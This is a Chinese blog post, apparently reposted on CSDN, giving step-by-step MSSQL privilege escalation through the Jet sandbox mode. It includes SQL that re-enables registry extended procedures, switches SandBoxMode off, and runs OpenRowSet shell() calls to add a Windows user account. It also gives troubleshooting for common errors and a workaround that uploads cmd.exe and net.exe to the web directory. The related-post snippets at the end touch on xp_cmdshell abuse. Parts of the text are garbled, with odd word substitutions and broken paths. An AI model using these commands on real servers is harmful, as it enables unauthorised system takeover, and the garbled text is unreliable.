sqlserver提权失败_MSSQL沙盒模式提权问题总结

最新推荐文章于 2024-03-28 16:37:48 发布
最新推荐文章于 2024-03-28 16:37:48 发布
阅读量316 收藏
点赞数
文章标签: sqlserver提权失败
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39636102/article/details/111925316
版权

MSSQL沙盒模式提权问题总结

恢复对注册表的读写存储。

dbcc addextendedproc ('xp_regread','xpstar.dll')

dbcc addextendedproc ('xp_regwrite','xpstar.dll')

修复沙盒的维护模式

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;

查看'SandBoxMode'值是否已经变成0了。

exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode'

最后调用沙盒模式

Select . From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Databasec:\windows\system32\ias\ias.mdb','select shell( net user itpro gmasfm /add )');

1.如果沙盒掩护模式未 封闭 ,会报错:

服务器: 消息 7357,级别 16,状态 2,行 1

未能处理对象 'select shell( cmd.exe /c net user user passwd /add )'。OLE DB 提供程序 'microsoft.jet.oledb.4.0' 指出该对象中没有任何列。

OLE DB 错误跟踪.Noninterface error: OLE DB provider unable to process object, since the object has no columnsProviderName'microsoft.jet.oledb.4.0', Queryselect shell( cmd.exe /c net user user passwd /add )'.。

2.如果.mdb不存在或是输入门路错误

服务器: 消息 7399,级别 16,状态 1,行 1

OLE DB 供给程序 'microsoft.jet.oledb.4.0' 报错。

.OLE/DB provider returned message: 找不到文件 'C:WINDOWSsystem32iasdnary1.mdb'。.

OLE DB 错误跟踪.OLE/DB Provider 'microsoft.jet.oledb.4.0' IDBInitialize::Initialize returned 0x80004005: .。

3.如果输入进程中多了一些空格,也会报错。尤其要留神这点,良多人直接网上找文章复制粘贴进去执行。

服务器: 消息 7357,级别 16,状态 2,行 1

未能处置对象 'select shell( cmd.exe /c net user user passwd /add )'。OLE DB 提供程序 'microsoft.jet.oledb.4.0' 指出该对象中不任何列。

OLE DB 毛病跟踪.Noninterface error: OLE DB provider unable to process object, since the object has no columnsProviderName'microsoft.jet.oledb.4.0', Queryselect shell( cmd.exe /c net user user passwd /add )'.。

4.假如mdb权限和cmd.exe权限错误,同样会也呈现问题。

当mdb权限不对时,

服务器: 新闻 7320,级别 16,状况 2,行 1

未能对 OLE DB 提供程序 'Microsoft.Jet.OLEDB.4.0' 执行查问。

.OLE/DB provider returned message: 未知.

OLE DB 过错跟踪.OLE/DB Provider 'Microsoft.Jet.OLEDB.4.0' ICommandText::Execute returned 0x80040e14.。

5.如果net权限不对时,却没有任何提醒。

终极的提权措施就是在当前的web目录下面上传体系的ias.mdb跟cmd.exe,net.exe三个文件。履行

select . from openrowset('microsoft.jet.oledb.4.0',';databaseE:\we\bias.mdb','select shell( E:\web\cmd.exe /c E:\web\net.exe user user passwd /add )')

胜利增添一个盘算机用户

阅读(838) | 评论(0) | 转发(0) |

0

上一篇:没有了

下一篇:没有了

weixin_39636102
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Mysql漏洞利用(越,实战怎么从低限拿到root密码)
07-30
Mysql漏洞利用(越,实战怎么从低限拿到root密码)
iOS_SandBox盒路径获取
01-22
在iOS应用开发中,"盒"(Sandbox)是一个重要的概念,它是每个应用程序的专属运行环境,确保了不同应用之间的数据隔离和安全性。每个iOS应用都有自己的盒目录,包含若干子目录,用于存储应用的数据、缓存、文档...
sqlserver操作
huike008的博客
08-22 395
得到SQLserver限,想进一步得到system限的方法总结 *************************** 利用xp_cmdshell *********************************** 一.更改sa口令方法: 用sql综合利用工具连接后,执行命令: exec sp_password NULL,'新密码','sa' (示:慎用!) 二.简单修补sa...
【SQL Server】
qq_43665434的博客
05-24 1092
【SQL Server】 实验环境:windowsXP + SQL Server2005 exec sp_configure 'show advanced options',1;reconfigure; exec sp_configure 'Ad Hoc Distributed Queries',1;reconfigure; --关闭模式,如果一次执行全部代码有问题,先执行上面两句代码。 exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTW
MSSQL SA错误集锦
收集盒 Book box
05-15 926
<br />  在webshell过程中使用MSSQL的SA账号来限拿服务器是比较有效的方法,但是在我们得到SA账号的密码去执行系统命令的时候往往会遇到各类错误示,无法正常执行系统命令。很多菜鸟朋友们遇到类似的问题可能就会选择放弃,其实这类问题是很常见的,现在管理员安全意识有所高,往往对SA账号做了限制,或者是对我们执行系统命令所需要的xp_cmdshell储存过程做了修改或者删除,这个xp_cmdshell就类似于我们的wscript.shell一样了,有时候遇到管理将该组件删除了的我们自己
的小tips
weixin_34228662的博客
01-08 203
今天刚好发现有一个SA限。服务器管理员将大部份扩展都删除了。最后自己重建sp_makewebtask存储才搞到一个webshell 了。(重建办法,先找台正常主机,sp_helptext 'sp_makewebtask',将他的SQL语句重新拷到目标机器执行一次就行了)。 当然有了webshell,无法满足我们贪婪的欲望。开始测试。有serv-u,但是失败了。也许...
xlgwwcjbxgq_盒游戏txt_dragdrop_gdrg_
10-01
标题“xlgwwcjbxgq_盒游戏txt_dragdrop_gdrg_”和描述“盒游戏”暗示了这个压缩包可能包含与盒类游戏相关的文本资源,如游戏脚本、教程或者MOD(游戏模组)的配置文件。标签“txt”表明文件类型主要是纯文本,...
iOS总结
03-02
1、获取程序的Home目录 NSString *path = NSHomeDirectory(); NSLog(@"path:%@",path); 打印结果: path:/Users/username/Library/Application Support/iPhone Simulator/5.1/Applications/BAE91297-A4C6-4DDC-A9...
SandBox_C:盒C-EFREI课程
04-05
盒_C中,我们可以通过一系列实际操作来学习和应用C语言。首先,我们需要对源代码进行编译。编译是将人类可读的源代码转换成机器可执行的二进制代码的过程。在这个课程中,我们使用的是GCC(GNU Compiler ...
ACI_Sandbox_Testing:思科ACI盒Ansible测试
02-21
本文将深入探讨“ACI_Sandbox_Testing”项目,这是一个使用Ansible在思科ACI盒环境中进行测试的实践案例。 首先,我们要理解什么是思科ACI盒。ACI盒是一个虚拟环境,允许用户在不涉及实际生产网络的情况下,...
1433之黑吃黑杀手锏——模式
03-07
1433之黑吃黑杀手锏模式
Windows:利用MSSQL数据库,Oracle数据库
qq_61553520的博客
05-30 1558
MSSQL数据库总结归纳:MSSQL数据库三种方式都是死的:固定得命令执行三种方式都是通过web限查看配置文件的方式获取到MSSQL数据库的账号密码,再进行的,MSSQL数据库是默认允许外链的,我们获得sa账户密码后,可以直接远程登录数据库。再数据库的SQL语句执行环境进行的。Oracle数据库的利用就很简单,工具梭哈即可。
1433终极入侵之模式
收集盒 Book box
05-08 788
<br />1433好扫,但是难入侵啊! <br /><br />不是127错误,就是命令被禁用。 不是缺少哪个DLL文件,就是126错误。<br /><br />哈,甚至连映像劫持、asshell、jobshell、seshell全部都使用不了,甚至SQL语句读写注册表都不行,该如何办?<br /><br />或许你忽略了一招你们忘记了模式的威力。其实很多人也知道模式,但是没有深究。所以忽视了它。<br /><br />下面我介绍它:<br /><br />select * from openro
iOS 13.5修复的漏洞解析
ccnyou的专栏
04-22 869
背景 要阅读此文,首先需要了解以下背景知识: 首先,iOS 盒进程访问一个资源的过程是这样的: 其次,iOS App的限是通过 XML 格式声明的,一个典型的Debug限如下: <key>get-task-allow</key> <true/> 这里声明了App具有 get-task-allow 限,此限将允许其他进程附加到App进行调试。 另外,AMFID使用 CoreFoundation.framework 里边的 CFPropertyLi
SQL Server 数据库常见总结
最新发布
m0_64481831的博客
03-28 1890
前面总结了linux和Windows的方式以及Mysql,这篇文章讲讲SQL Server数据库的
OLE DB 供程序 'sqloledb' 为列供的元数据不一致。执行时更改了名称。
06-13 6221
OLE DB 供程序 'sqloledb' 为列供的元数据不一致。执行时更改了名称。 一个关于“OLE DB 供程序 'sqloledb' 指出该对象中没有任何列”错误的解决方法   在网上看到一个网友问把系统过程的结果输出到文本文件 ,心想这不简单呀,bcp+openrowset呀轻松解决呀,本着认真的态度(其实是怕写个错误的让人家笑话我)我在我的查询分析器里写个试: --1
数据库--MSSQL
qq_45936617的博客
10-11 667
MSSQL是微软公司开发的数据库,又称为sql server数据库服务器。在基于微软开发的IIS中间件服务器开发的网站,通常使用的就是MSSQL数据库。常见的MSSQL数据库的方式有 xp_cmdshell、sp_oacrate及JOB等,本文学习的是三种方式利用原理、利用条件以利用方法。
升-MY&MS&ORA等SQL数据库
xhscxj的博客
03-02 1100
在利用系统溢出漏洞无果的情况下,可以采用数据库进行,但需要知道数据库的前条件: 服务器开启数据库服务及获取到最高限用户密码。除 Access 数据库外,其他数据库基本都存在数 据库的可能 数据库应用升中的意义 WEB 或本地环境如何探针数据库应用 数据库限用户密码收集等方法 目前数据库对应的技术及方法等 流程:服务探针-信息收集-利用-获取限 一、UDF 知识点:(基于 MYSQL 调用命令执行函数) 读取网站数据库配置文件(了解其命名规则及查找技巧).
Windows升 —SQL Server/MSSQL数据库
剁椒鱼头没剁椒的博客
03-21 2114
在之前的Windows升—MySQL数据库中已经介绍了关于数据库方面的升,同时在Windows升—溢出的时候,简要的介绍了关于Windows方面整体的流程与方式,这里就不再赘述,直接进行Windows升—SQL Server/MSSQL数据库的。SQL Server与MSSQL其实就是一个东西,只是叫法不同。Windows升—MySQL数据库Windows升—溢出
vscode 如何以非模式启动
06-11
您可以按照以下步骤在 VS Code 中以非模式启动: 1. 打开 VS Code,并点击左下角的“设置”按钮(或使用快捷键 Ctrl+,)。 2. 搜索框中输入“sandbox”,然后找到“Sandbox: Windows”设置项。 3. 将该设置...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值